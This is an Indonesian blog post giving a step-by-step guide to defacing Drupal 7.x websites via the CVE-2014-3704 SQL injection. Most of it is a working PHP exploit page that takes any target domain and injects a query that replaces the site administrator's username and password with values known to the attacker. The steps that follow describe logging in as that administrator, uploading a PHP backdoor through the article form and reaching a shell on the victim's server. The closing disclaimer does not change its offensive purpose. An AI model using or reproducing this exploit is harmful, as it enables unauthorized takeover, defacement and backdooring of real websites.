Friday, June 9, 2017

Cara deface dengan Exploit Drupal Core 7.x Auto SQL Injection

Catatan kali ini akan membahas langkah-langkah untuk melakukan deface dengan menggunakan exploit pada website yang menggunakan CMS Drupal....

Exploit source code yang dapat digunakan ialah dibawah ini.

<?php ?>  <!Doctype HTML>
<html>
<head>
        <title>Drupal Exploit</title>
<body>
</head>
<body>
        <div class="mymargin">
                <center>
                        <font color="red"><h1>Drupal Exploit</h1></font>
                         
        <form method="GET" action="">
                Site : <input type="text" name="url" placeholder="Example: www.site.com">
                <input type="submit" name="submit" value="suck it !">
        </form>
        <br>
<?php
#-----------------------------------------------------------------------------#
# Exploit Title: Drupal core 7.x - SQL Injection                              #
# Date: Oct 16 2014                                                           #
# Exploit Author: Dustin D&#1043;rr                                                 #
# Software Link: http://www.drupal.com/                                       #
# Version: Drupal core 7.x versions prior to 7.32                             #
# CVE: CVE-2014-3704                                                          #
#-----------------------------------------------------------------------------#
$file = fopen("rock-you.txt", "a");
error_reporting(0);
if (isset($_GET['submit'])) {
    $url = "http://" . $_GET['url'];
    $post_data = "name[0;update users set name %3D 'fuckyou' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
    $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
", 'content' => $post_data));
    $ctx = stream_context_create($params);
    $data = file_get_contents($url . '/user/login/', null, $ctx);
    echo "<h4>Scanning at \"/user/login/</h4>\"";
    if ((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
        $fp = fopen("rock-you.txt", 'a');
        echo "Success! User:fuckyou Pass:admin at {$url}/user/login <br>";
        echo '<font color="#00FF66">Finished scanning. check => </font><a href="rock-you.txt" target="_blank">Rock You </a></font> ';
        fwrite($fp, "Succes! User:fuckyou Pass:admin -> {$url}/user/login");
        fwrite($fp, "
");
        fwrite($fp, "======================================Donnazmi==============================================================");
        fwrite($fp, "
");
        fclose($fp);
    } else {
        echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
    }
}
if (isset($_GET['submit'])) {
    $url = "http://" . $_GET['url'] . "/";
    $post_data = "name[0;update users set name %3D 'fuckyou' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
    $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
", 'content' => $post_data));
    $ctx = stream_context_create($params);
    $data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
    echo "<h4>Scanning at \"Index</h4>\"";
    if (stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
        $fp = fopen("rock-you.txt", 'a');
        echo "Success! User:fuckyou Pass:admin at {$url}/user/login <br>";
        echo '<font color="red">Finished scanning. check =>  </font><a href="rock-you.txt" target="_blank">Rock you !</a></font> ';
        fwrite($fp, "Success! User:fuckyou Pass:admin -> {$url}/user/login");
        fwrite($fp, "
");
        fwrite($fp, "======================================Donnazmi==============================================================");
        fwrite($fp, "
");
        fclose($fp);
    } else {
        echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
    }
}
?>
<br>
        </div>

</body>
</html>

Atau bisa donlot disini Drupal Source Code Exploit.

Setelah donlot lakukan langkah-langkah dibawah ini.

1. Simpan source code diatas dengan ekstensi .php lalu save di hosting local (xampp bila di windows atau apache bila linux). Setelah itu akses drupal exploit tersebut dari web-browser.







2. Masukan domain target lalu tekan suck it, kalau sukses maka penampakannya seperti dibawah ini.











3. Masuk ke URL: http://site.com/user/login, lalu masukan username: fuckyou, password: admin

4. Apabila berhasil login langkah selanjutnya kita ingin memasukan sourcecode backdoor dengan masuk ke http://site.com/node/add/article, masukan source code backdoor dibawah ini dalam format PHP. Kamu bisa di donlot disini -> source code backdoor drupal.

Setelah selesai lalu di Save.

5. Setelah selesai save maka kita akan langsung di redirect ke shell tempat hosting target.

















PS : Jangan sembarangan gunain ya, tujuan penggunaan diluar tanggung jawab penulis.

No comments:

Post a Comment